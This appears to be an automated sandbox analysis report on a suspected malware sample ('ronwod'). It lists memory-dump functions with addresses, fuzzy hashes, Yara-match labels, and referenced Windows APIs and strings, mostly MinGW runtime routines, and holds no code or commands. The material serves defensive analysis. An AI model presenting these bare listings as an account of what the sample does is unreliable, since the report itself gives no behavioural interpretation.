Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c2ecff3853d05a80752d91f1f2254589cb319cabc824830e2b7081d4dea16a
Instruction ID: 65555ac1e6a92fd017c02bec76b49f79eca224f2b9d6d92ed8082fe95b33dd51
Opcode Fuzzy Hash: 19c2ecff3853d05a80752d91f1f2254589cb319cabc824830e2b7081d4dea16a
Instruction Fuzzy Hash: 93310A33A187214BC7199D3C8C5426A7A929BD5630F1A8B7FEFBA9B3D1DA34484143C5

Function 0145BD8F Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c16f3444b0b094377069d5519920af51edd7b4ac352657e3f7a9c34b0240e7f
Instruction ID: d68fa84b6ed5b448f87646bc4cc56a8e0bf6cb1b688e7296918b309936935059
Opcode Fuzzy Hash: 0c16f3444b0b094377069d5519920af51edd7b4ac352657e3f7a9c34b0240e7f
Instruction Fuzzy Hash: 24312635611700CFD7658F39C890622B7A3FF8A314B28D19EC5968BBA6D73AE403CB05

Function 0146822F Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8962e0c843a8ad61b4de5a3c7a88b21663e225bf99257fe1f551d299fdee69
Instruction ID: 868957ba0f2a4fce409a9feb361a77459ae92071c5214ba74257cb04d953a246
Opcode Fuzzy Hash: db8962e0c843a8ad61b4de5a3c7a88b21663e225bf99257fe1f551d299fdee69
Instruction Fuzzy Hash: 8C2126B2909712DFE7209B29D800B3F73E9EFD4718F55043DEE5857262E731A9028B86

Function 01469A43 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13c34e3e80f4dc385263b4ea1b8189c54744f5ca587294a9c7a308c160ee0666
Instruction ID: d92e8f2e7860b427f801f216c8991fd03c29614bcb48ec158644d975ab895fd5
Opcode Fuzzy Hash: 13c34e3e80f4dc385263b4ea1b8189c54744f5ca587294a9c7a308c160ee0666
Instruction Fuzzy Hash: 22319131918325DFE7209F28D44076FB3E4FB99708F02992EEA8967265D7719905CB82

Function 01480400 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 372ad1ff74552461fca240d80be4cef8142d2595ffd121e80baef1c9d84bd7cc
Instruction ID: a5cf09a4028c083aa76998dd36d17c7e16a0b1a149c79323364c7cee2b26f710
Opcode Fuzzy Hash: 372ad1ff74552461fca240d80be4cef8142d2595ffd121e80baef1c9d84bd7cc
Instruction Fuzzy Hash: C9219579A642015BD7209E1CDC80ABEBBA6EBC0728F18853DEA80873B6DA309459C351

Function 014691B1 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dd2e385ef1e039d815e4c03aca8cbadbfe134e84e2285dc6250524b7cd837818
Instruction ID: e3c53881b2c286778bf8940ba3aede822d1148b2e70bf02998f4cef27244559f
Opcode Fuzzy Hash: dd2e385ef1e039d815e4c03aca8cbadbfe134e84e2285dc6250524b7cd837818
Instruction Fuzzy Hash: CF11EF31A09221EFE7318B5CC840B7F77AAEB94B0CF56442EE9459B276C772D841C786

Function 01455F4C Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb07a6d60b96cceea6cf22810237b9f8ce1a20fd1f8a1300c9bafed9269d64e0
Instruction ID: eb136430e8472d4b41bcf77f3a5ddcd51c34771e5118708d33d78ecd40a12e42
Opcode Fuzzy Hash: fb07a6d60b96cceea6cf22810237b9f8ce1a20fd1f8a1300c9bafed9269d64e0
Instruction Fuzzy Hash: C4212E766083009BE3A4CE2CC49077FB6E2BFC8714F45542EE9CAD33A6CA71A8418749

Function 01469266 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ec73713a3139934b02926e09cb174606ba1aea47c081872aa531fd3b33ae61
Instruction ID: 3e737443bd8a33dbafb936567acc92206e67182865eac194ef912ff3b805f6a1
Opcode Fuzzy Hash: f7ec73713a3139934b02926e09cb174606ba1aea47c081872aa531fd3b33ae61
Instruction Fuzzy Hash: 2A217532A192208FE724CB68C05037BB3E1BB98B09F17952DDC89A73A5C3719C51C7C2

Function 01455E8C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d53d247726665ab2b73dff4a65a4d4d5d9f77f9745e2a4f7b6f57dad5c1cc09e
Instruction ID: 5c8601255637549b7078b877e608f9808aa13bacd6d8c6dff65facdc1d8d96d7
Opcode Fuzzy Hash: d53d247726665ab2b73dff4a65a4d4d5d9f77f9745e2a4f7b6f57dad5c1cc09e
Instruction Fuzzy Hash: 94114C366147108BE739CE1CC89077FB2D6AFC4314F99543D9EC9AB3A6DA716880C754

Function 0146D5E6 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: badb5bae8865591055156373f8188c9868c867874bfa0e6774b597c6710769e4
Instruction ID: debd8de464d0c7f74e4f2162b848e95e4e63468663d9a1a6b3fddf13561b9ad6
Opcode Fuzzy Hash: badb5bae8865591055156373f8188c9868c867874bfa0e6774b597c6710769e4
Instruction Fuzzy Hash: 29210A76A2522006CB2CCF39D8A96BEE292EB81300F19E63DD446E73A0FF3485008745

Function 01474E60 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 9e664acd4f42fe1ec2bc5e125509bdf47555c8b831b1681146b37738778037b4
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: E4118233A0D1E44ED3168D3C84009B6BFE34A93535B5D879AE4B89B2E2D6338D8A8355

Function 01469F80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
Instruction ID: c18fc77bd029cd1869f5009c3eb18289861ecfcfefe361840ad728d75317378a
Opcode Fuzzy Hash: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
Instruction Fuzzy Hash: 890171F1B003025FFB249E59E4E0B2BB6AC6FA061CF19492ED90457315EBF5E805C692

Function 0147B8A0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b4751251f37a4c26d0c07066987a9a627b9f40db8d6d996bce6c28a7a823ff9
Instruction ID: 6e3720b47f1cb5b42139aa18c9630c5b05c2e67151438f697c4f9b26459cfd66
Opcode Fuzzy Hash: 1b4751251f37a4c26d0c07066987a9a627b9f40db8d6d996bce6c28a7a823ff9
Instruction Fuzzy Hash: 38110875008308AFD321AB18DC848BFBBAAFFD9319F05082DD68457331E232A964CB51

Function 0144A2A6 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ae2192da37b50de18a0b44ab6ce19d8525410e55f4731ad2ebead2d79350f8
Instruction ID: a922dcec4153491ef1da2640c53e54c2bc0eabd54444ef0d4d58fd328777eafb
Opcode Fuzzy Hash: 84ae2192da37b50de18a0b44ab6ce19d8525410e55f4731ad2ebead2d79350f8
Instruction Fuzzy Hash: FF110831A983518FF7348F6A8410276BBE5AF8261573DC92EC5D397315EB7494428F84

Function 6C523852 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c1f4a78497161579e669a702d23c84490e98ad70ac84feda23ebb4ed4ef18d
Instruction ID: 14c17112b4ec338bbd9c6875604c81cc60b052ac335ccae1dc150d73eeba5e9d
Opcode Fuzzy Hash: e2c1f4a78497161579e669a702d23c84490e98ad70ac84feda23ebb4ed4ef18d
Instruction Fuzzy Hash: 43215B7191050AEF9B40CFBCE686A8EBBF4EF58300F614995A410FB294D774EB509B11

Function 0147CDF0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb3065a98f717e7a56ed8cafbd2f24768b9cd38b43c24f1b9f16363b4e732181
Instruction ID: ac5abf608ec732a13c3c8fe647b6d3c9fa43bc40b6ff1f00ae5747350efb577c
Opcode Fuzzy Hash: cb3065a98f717e7a56ed8cafbd2f24768b9cd38b43c24f1b9f16363b4e732181
Instruction Fuzzy Hash: 3201D632D15A614BD329CE3CC81039A73E6EBC5315F098538DA45E77A8D77A98908780

Function 0146C7DD Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae238ce08bef3b7cdbe6f957c1a9b53464a99dc80df29f1fd7d777460462255
Instruction ID: 69b934db3141fbbe70a77babe460ccfeb1fead45e94aca6bf9d8d7b66a82d315
Opcode Fuzzy Hash: 2ae238ce08bef3b7cdbe6f957c1a9b53464a99dc80df29f1fd7d777460462255
Instruction Fuzzy Hash: 28F024344882C345D32A863D80B0332BFD54F67265B2C80ADC4E2533D2C73680098700

Function 0144A533 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684

Function 6C528B80 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C528BAF
vfprintf.MSVCRT ref: 6C528BCF
abort.MSVCRT ref: 6C528BD4
VirtualQuery.KERNEL32 ref: 6C528C6B

Strings

Mingw-w64 runtime failure:, xrefs: 6C528BA8
VirtualProtect failed with code 0x%x, xrefs: 6C528CE6
Address %p has no image-section, xrefs: 6C528D2B
VirtualQuery failed for %d bytes at address %p, xrefs: 6C528D17

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 424b55d2bbd9b5937c3ee75b8b2916650f42e7799ed0459fd4a17ebe04eb412b
Instruction ID: 49fb4619ffa6d73252777180d82d1d31f0b6c432a7d8eace60f21084ecb85ae4
Opcode Fuzzy Hash: 424b55d2bbd9b5937c3ee75b8b2916650f42e7799ed0459fd4a17ebe04eb412b
Instruction Fuzzy Hash: 7B515AB26057008FC700DF69DC8865ABBF0FF85318F558A1EE4989B790E738E904CB92

Function 00A13DA0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00A13DCF
vfprintf.MSVCRT ref: 00A13DEF
abort.MSVCRT ref: 00A13DF4
VirtualQuery.KERNEL32 ref: 00A13E8B

Strings

Mingw-w64 runtime failure:, xrefs: 00A13DC8
Address %p has no image-section, xrefs: 00A13F4B
VirtualQuery failed for %d bytes at address %p, xrefs: 00A13F37
VirtualProtect failed with code 0x%x, xrefs: 00A13F06

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 8b1b4bd553fe2985172ea39c1aff70ab172342cac6fe45be7612e14a626c7a21
Instruction ID: 19e87ba34539cc5b81362a68030a9fa2e01acdf48c6bef9fff68bd9e3dea0e8d
Opcode Fuzzy Hash: 8b1b4bd553fe2985172ea39c1aff70ab172342cac6fe45be7612e14a626c7a21
Instruction Fuzzy Hash: 31515BB29043019FCB00EF68E98569AFBF5FF88314F45C91CE4889B255D734E989CB92

Function 6C5213E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C5213F0
LoadLibraryA.KERNEL32 ref: 6C521406
GetProcAddress.KERNEL32 ref: 6C521425
GetProcAddress.KERNEL32 ref: 6C521437

Strings

libgcc_s_dw2-1.dll, xrefs: 6C5213E9, 6C5213FF
__register_frame_info, xrefs: 6C52141A
__deregister_frame_info, xrefs: 6C52142C

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 6d50565127207c7f0d9687192e8b3e315ccbef2cb686b092af9c36c3f9efdf01
Instruction ID: 6f7bd7800f597eeb434d929725bf091da7a12fc7ce19ab26b6e762efb7d98140
Opcode Fuzzy Hash: 6d50565127207c7f0d9687192e8b3e315ccbef2cb686b092af9c36c3f9efdf01
Instruction Fuzzy Hash: BF015EB2A096448BC700BFB99D0635F7EF4EB82240F42452ED88957650E735D804DBD7

Function 00A142D0 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00A1430F
signal.MSVCRT ref: 00A14356
signal.MSVCRT ref: 00A1436F
signal.MSVCRT ref: 00A14396
signal.MSVCRT ref: 00A143D2
signal.MSVCRT ref: 00A1441F
signal.MSVCRT ref: 00A14435
signal.MSVCRT ref: 00A1444B

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 4332438461e0f3d20ee939561e08a073e8f04b865790df535d43f45a73bb94b9
Instruction ID: c1acdcb087a6a3c53671fe10fbd6c8baf4170ca0468a71dfc289fc7859c07477
Opcode Fuzzy Hash: 4332438461e0f3d20ee939561e08a073e8f04b865790df535d43f45a73bb94b9
Instruction Fuzzy Hash: 763130B410C2118BE7106FACE5543EEBAE4BB4D368F16490DD4E5CB281DB79C8C59B53

Function 6C521020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C521281,?,?,?,?,?,?,6C5213AE), ref: 6C521057
_amsg_exit.MSVCRT ref: 6C521086

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 21386a2a5c39b11d78397419825f9552c0519d37982c2d139f67cfd017a3190a
Instruction ID: 1acd33c68e2778a6806bbf7cd520880732753391489fe42c44dee86db53259f4
Opcode Fuzzy Hash: 21386a2a5c39b11d78397419825f9552c0519d37982c2d139f67cfd017a3190a
Instruction Fuzzy Hash: E5318F70708640CBEB009F69CD8475BB7F1EB86348F42492EC5449BB80DB7ACD45DB86

Function 0146349F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 149COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 01463561
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0146365E

Strings

afrf, xrefs: 014635CB
dfkf, xrefs: 014635B6
tfff, xrefs: 014635BD

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: afrf$dfkf$tfff
API String ID: 237503144-335445692
Opcode ID: 49992bf5ed81cca42d386d5a2404da2a04c659d5adefaafd51377f1d573b39df
Instruction ID: b47e0a27a7d6fcc420f19f1db8948da268cb6668fb25ea4ef26cbc538685eb1f
Opcode Fuzzy Hash: 49992bf5ed81cca42d386d5a2404da2a04c659d5adefaafd51377f1d573b39df
Instruction Fuzzy Hash: AE51CCB1D002149FDB14CF9AD882BAE7BB4FB84314F15816DE904AF399C7758942CBE6

Function 014684C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 01468577

Strings

S%1e, xrefs: 01468590
S%1e, xrefs: 01468500, 01468546
B]C], xrefs: 014684D2
B]V], xrefs: 014684E2

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: B]C]$B]V]$S%1e$S%1e
API String ID: 237503144-91396555
Opcode ID: 39c2633a2c75243abd0a2344fecfb20ec0085086be7c08de33da95b5461ac6db
Instruction ID: 2597d203844285c540d8bd23d956782a8fcb787797f78222a54b2dfb25a91701
Opcode Fuzzy Hash: 39c2633a2c75243abd0a2344fecfb20ec0085086be7c08de33da95b5461ac6db
Instruction Fuzzy Hash: 6721057260C3155FE328CF29D8557ABF3E7EBC4704F11C83D95899B2D5DAB084068796

Function 6C529700 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C529719
_unlock.MSVCRT ref: 6C529741
calloc.MSVCRT ref: 6C52978F

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 85889fc0976c20d2ac8dca3f452a76718e4aa8bc6fc75f5976de390fb22808c1
Instruction ID: 7b07b868e4a0aeb87f6ba4b5b8766d0102f7de1889c99482e09e2c65ecdf6bb6
Opcode Fuzzy Hash: 85889fc0976c20d2ac8dca3f452a76718e4aa8bc6fc75f5976de390fb22808c1
Instruction Fuzzy Hash: FB113AB5504211CFDB40DF28D880796BBE0EF86314F198A69D898CB785EB38D844CB92

Function 00A13F60 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 00A140CD
Unknown pseudo relocation protocol version %d., xrefs: 00A14253
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00A14080

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

